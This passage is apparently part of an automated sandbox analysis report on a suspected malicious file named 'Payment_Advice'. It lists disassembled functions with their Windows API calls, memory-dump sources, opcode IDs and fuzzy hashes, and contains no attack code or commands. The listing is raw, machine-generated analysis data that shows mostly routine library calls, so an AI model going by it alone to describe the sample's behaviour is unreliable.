                                                                                                    • Instruction Fuzzy Hash: 0E41BD706083428FDB24DF15E58456EBFE5FFD4320F148A2DE891832EAD774AD448A91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00501E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00501E55
                                                                                                      • Part of subcall function 00503BBA: __EH_prolog.LIBCMT ref: 00503BBF
                                                                                                    • _wcslen.LIBCMT ref: 00501EFD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838827086-0
                                                                                                    • Opcode ID: 3fe8341cd1254c001f0a507fbafcd599479d77b24ae1722468cd93d23bd87d05
                                                                                                    • Instruction ID: 02ef87603b7176655dabb2a98ec7496fbcab5af2325cec38c4c38ad4f842c7c7
                                                                                                    • Opcode Fuzzy Hash: 3fe8341cd1254c001f0a507fbafcd599479d77b24ae1722468cd93d23bd87d05
                                                                                                    • Instruction Fuzzy Hash: B2314B7190460AAFDF11DF98C949AEEBFF9BF88304F1044A9E845A7291CB365E40CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005073BC,?,?,?,00000000), ref: 00509DBC
                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00509E70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1392018926-0
                                                                                                    • Opcode ID: 15e2ecf69062da30ffaa28961ee6756e1f9f507f883cfbb977d200a992869c8f
                                                                                                    • Instruction ID: 172a0db809cf359bf0fbe3686c3567feb887097e5b20466ebae3e13075993763
                                                                                                    • Opcode Fuzzy Hash: 15e2ecf69062da30ffaa28961ee6756e1f9f507f883cfbb977d200a992869c8f
                                                                                                    • Instruction Fuzzy Hash: D021F032288246ABC714CF34C895AABBFE8BF91304F08491CF4D587186D328ED4DDBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00509F27,?,?,0050771A), ref: 005096E6
                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00509F27,?,?,0050771A), ref: 00509716
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 3187b038bfebb0b6c2423a6abfb8bbb52173c366db1a8c4c307ac352fe6ec74c
                                                                                                    • Instruction ID: e1655c911ecb3dfa1a34fdf8e95dbc56c705a851e0ada31d80378ab9c2a91412
                                                                                                    • Opcode Fuzzy Hash: 3187b038bfebb0b6c2423a6abfb8bbb52173c366db1a8c4c307ac352fe6ec74c
                                                                                                    • Instruction Fuzzy Hash: A121FFB15003456FE3308A64CC89BFBBBDCFB89320F000A18FAD6C61D6C7B5A8848671
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00509EC7
                                                                                                    • GetLastError.KERNEL32 ref: 00509ED4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 0a6158299aa3ffc916140a71aa7cbf40d14819c40828f50944f9d0976a80c217
                                                                                                    • Instruction ID: b1af47f4cd1342204c5c7442266cccd6d6ca5a97ee3d84b1a6919f1de4f1fabb
                                                                                                    • Opcode Fuzzy Hash: 0a6158299aa3ffc916140a71aa7cbf40d14819c40828f50944f9d0976a80c217
                                                                                                    • Instruction Fuzzy Hash: D511A531640701ABD734C628CC49BAEBBEDBB45360F504A29E563D26D5D770ED89C760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00528E75
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00541098,005017CE,?,?,00000007,?,?,?,005013D6,?,00000000), ref: 00528EB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2447670028-0
                                                                                                    • Opcode ID: 37fce5a3606daae8118637ddab7e0f1c4e22eb5b5dd0c1f16d370deece23773f
                                                                                                    • Instruction ID: 4bd6ba07b3f10c8eb37d3fb409e979ff0c5038ce786420289a25406975414a91
                                                                                                    • Opcode Fuzzy Hash: 37fce5a3606daae8118637ddab7e0f1c4e22eb5b5dd0c1f16d370deece23773f
                                                                                                    • Instruction Fuzzy Hash: 33F04F32607236669B216AE5BC09B7F2F5CBFD3B70F264525F814AA1E1DF609D0091A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 005110AB
                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 005110B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: 3d9056ddbe1e057733116335ae4e99ea7498da68fff70b71caf92abc783d16ab
                                                                                                    • Instruction ID: 8d9c9d8967f926d38def09e43c4a92c8b90208255a29b9b0c1adbf2c113277dc
                                                                                                    • Opcode Fuzzy Hash: 3d9056ddbe1e057733116335ae4e99ea7498da68fff70b71caf92abc783d16ab
                                                                                                    • Instruction Fuzzy Hash: 03E09236F00545A7DF0D87A49C0D9EB7ADDFA5824431041F9E603D7201F934DEC54664
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 7707ca0b14e516cb9638609f0862caf9a1d5c88ab5a468263cb2de5cd538427b
                                                                                                    • Instruction ID: abbeb92f6f28b564555ca355584c8c35834485cea0b0baf41e7313d228320369
                                                                                                    • Opcode Fuzzy Hash: 7707ca0b14e516cb9638609f0862caf9a1d5c88ab5a468263cb2de5cd538427b
                                                                                                    • Instruction Fuzzy Hash: 86F0303224020ABBEF115F60DC49FDE3B6CBF14385F448051B945D51A0DB71DAD9EA50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641,000000FF), ref: 0050A1F1
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641), ref: 0050A21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643169976-0
                                                                                                    • Opcode ID: da81a5a80774580fa6a44cabb8f5f92fc4211966387ff793bce28f5d20b22efa
                                                                                                    • Instruction ID: 071502cc6d040be4851130bd8edc33c15a75c2af61efeeca5927a74077e210c5
                                                                                                    • Opcode Fuzzy Hash: da81a5a80774580fa6a44cabb8f5f92fc4211966387ff793bce28f5d20b22efa
                                                                                                    • Instruction Fuzzy Hash: 05E0923524020A7BEB015F60DC89FDD3B9CBF183C6F484021B944D2190EB61DEC8EB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00532641,000000FF), ref: 0051ACB0
                                                                                                    • OleUninitialize.OLE32(?,?,?,?,00532641,000000FF), ref: 0051ACB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3856339756-0
                                                                                                    • Opcode ID: d45736560ee21fd8f5e79441f0bba09e58707953734566be01a1636013314ab2
                                                                                                    • Instruction ID: b5b7c805935911e711f294a6a411999062ef21ff4c72fed461662edd91f359df
                                                                                                    • Opcode Fuzzy Hash: d45736560ee21fd8f5e79441f0bba09e58707953734566be01a1636013314ab2
                                                                                                    • Instruction Fuzzy Hash: 81E06D76604A50EFCB009B5DDC06B4AFFA8FB89F20F00426AF416D37A0CB74A840CA90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0050A23A,?,0050755C,?,?,?,?), ref: 0050A254
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0050A23A,?,0050755C,?,?,?,?), ref: 0050A280
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: a07fe7bf02aeb7fd1685134665fc3d957d64eee3ed47553f691cf65f9728c492
                                                                                                    • Instruction ID: 361a74942870d37aec692f5c4b1099640f5660f40e306f7a28fa1d916669c560
                                                                                                    • Opcode Fuzzy Hash: a07fe7bf02aeb7fd1685134665fc3d957d64eee3ed47553f691cf65f9728c492
                                                                                                    • Instruction Fuzzy Hash: 01E06D355001249BDB10AB64CC09BD97B98AB183E1F044261BD44E32D0D7709E888AA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0051DEEC
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0051DF03
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718869927-0
                                                                                                    • Opcode ID: 6bad9a73ed49ee09c5f5783d06b0115a8e8be62507afe7e904e743c493be4388
                                                                                                    • Instruction ID: be1e5b184eea79fba2690f7d0d7a67c42dc49f3f92ccff984f5b2bc669f89c5f
                                                                                                    • Opcode Fuzzy Hash: 6bad9a73ed49ee09c5f5783d06b0115a8e8be62507afe7e904e743c493be4388
                                                                                                    • Instruction Fuzzy Hash: F5E09BB550024926EF01A764DC0FFEE3F6C6B15789F040851B700DB0E3DA75DA589661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1175261203-0
                                                                                                    • Opcode ID: b8cf21611090411d3803c8dcd94588249362ab490318bbe597ce306f4afd1ef6
                                                                                                    • Instruction ID: 45c4a9a943fa01d1c50ac80aa48f2e230b0acad53d121ce818dabf1148d11e5e
                                                                                                    • Opcode Fuzzy Hash: b8cf21611090411d3803c8dcd94588249362ab490318bbe597ce306f4afd1ef6
                                                                                                    • Instruction Fuzzy Hash: 33E012765011186ADB11A7949C4DFDA7BACBF49391F0400657645D2144D774DAC48AA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0051A3DA
                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0051A3E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1918208029-0
                                                                                                    • Opcode ID: 3005c95a2a280fff307b9a0f6f4befb985325dc675e5b1b8214a534a7da55276
                                                                                                    • Instruction ID: 376a7b6cca6e6ec6b7cd2705cc5f1b1ac2c94b0cdacf82329517435d24745ad4
                                                                                                    • Opcode Fuzzy Hash: 3005c95a2a280fff307b9a0f6f4befb985325dc675e5b1b8214a534a7da55276
                                                                                                    • Instruction Fuzzy Hash: 32E0E571905219EBEB10DF99C945BD9BFE8FB04360F20845AA89693201E3B4AE84DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00522BAA
                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00522BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1660781231-0
